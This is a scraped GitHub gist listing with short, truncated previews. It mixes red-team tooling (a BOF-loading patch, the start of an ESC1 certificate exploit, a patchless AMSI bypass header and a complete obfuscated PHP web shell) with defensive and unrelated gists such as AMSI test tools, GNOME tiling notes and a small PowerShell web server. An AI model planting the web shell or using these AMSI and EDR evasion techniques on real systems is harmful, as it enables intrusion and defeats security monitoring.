
@zimnyaa
zimnyaa / caveman-bof.diff
Created July 28, 2023 13:02
A patch for NiCOFF to load the BOF in a memory region of a trusted DLL.
diff --git a/Main.nim b/Main.nim
index ef19f4c..c133586 100644
--- a/Main.nim
+++ b/Main.nim
@@ -128,7 +128,7 @@ proc ApplyGeneralRelocations(patchAddress:uint64,sectionStartAddress:uint64,give
echo "[!] No code for type: ",givenType
var allocatedMemory:LPVOID = nil
-
+var caveLibH: HANDLE
@zimnyaa
zimnyaa / rwxscan.nim
Last active August 9, 2023 13:40
A simple dynamic RWX allocation scanner. Used to find system libraries that alloc RWX regions on load.
import winim
import std/strutils, os

proc lpwstrc(bytes: array[MAX_PATH, WCHAR]): string =
  result = newString(bytes.len)
  for i in bytes:
    result &= cast[char](i)
  result = strip(result, chars = {cast[char](0)})

var pages = newSeq[int](0)
@bmaupin
bmaupin / tiling-extensions-for-gnome.md
Last active May 6, 2024 22:13
Tiling extensions for Gnome

Goal: find a Linux alternative to FancyZones for Windows

| Name | Recommended | Type | Supports main column | Supports layouts | Multiple windows in same tile | Windows can span multiple zones | Notes |
|---|---|---|---|---|---|---|---|
| gSnap | 👍👍 | Gnome extension | yes | yes | yes | yes | Can be configured almost just like FancyZones; in the settings: disable *Show tabs*, enable *Hold CTRL to snap windows* |
| gTile | | Gnome extension | no? | | | | |
| Tiling Assistant | 👍 | Gnome extension | yes | yes | yes | yes | Layout support is "experimental" and the UX is a bit unintuitive; after enabling layouts, you have to click the star icon beside a layout to mark it as a favourite before you can then hold Alt while dragging |
@b4cktr4ck2
b4cktr4ck2 / esc1.ps1
Created February 22, 2023 21:50
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER
@0xSojalSec
0xSojalSec / rev_shell.php
Created January 28, 2023 18:46 — forked from terjanq/rev_shell.php
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
@commonsensesoftware
commonsensesoftware / DotNet4Console.csproj
Created June 9, 2022 18:27
.NET 4.0 Console using VS2022
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net40</TargetFramework>
  </PropertyGroup>
  <ItemGroup>
    <PackageReference Include="Microsoft.NETFramework.ReferenceAssemblies.net40" Version="1.0.2">
      <PrivateAssets>all</PrivateAssets>
      <IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets>
    </PackageReference>
@CCob
CCob / patchless_amsi.h
Created April 17, 2022 16:18
In-Process Patchless AMSI Bypass
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@zimnyaa
zimnyaa / iocpipe.py
Created February 17, 2022 11:10
Check whether an SMB pipe name for pivoting is a known IoC
import re, sys

def rule_startswith(ioc_string):
    def __match(pipename):
        if pipename.startswith(ioc_string):
            print("\tMATCH startswith({})".format(ioc_string))
            return True
        return False
    return __match
@mgraeber-rc
mgraeber-rc / AMSITools.psm1
Created November 10, 2021 18:41
Get-AMSIEvent and Send-AmsiContent are helper functions used to validate AMSI ETW events. Note: because this script contains the word AMSI, it will flag most AV engines. Add an exception on a test system accordingly in order to get this to work.
filter Send-AmsiContent {
<#
.SYNOPSIS
Supplies the AmsiScanBuffer function with a buffer to be scanned by an AMSI provider.
Author: Matt Graeber
Company: Red Canary
.DESCRIPTION
@rminderhoud
rminderhoud / powershell-web-server.ps1
Last active May 4, 2024 14:02 — forked from 19WAS85/powershell-web-server.ps1
A simple web server built with powershell.
# This is a super **SIMPLE** example of how to create a very basic powershell webserver
# 2019-05-18 UPDATE — Created by me and evaluated by @jakobii and the community.
# Http Server
$http = [System.Net.HttpListener]::new()
# Hostname and port to listen on
$http.Prefixes.Add("http://localhost:8080/")
# Start the Http Server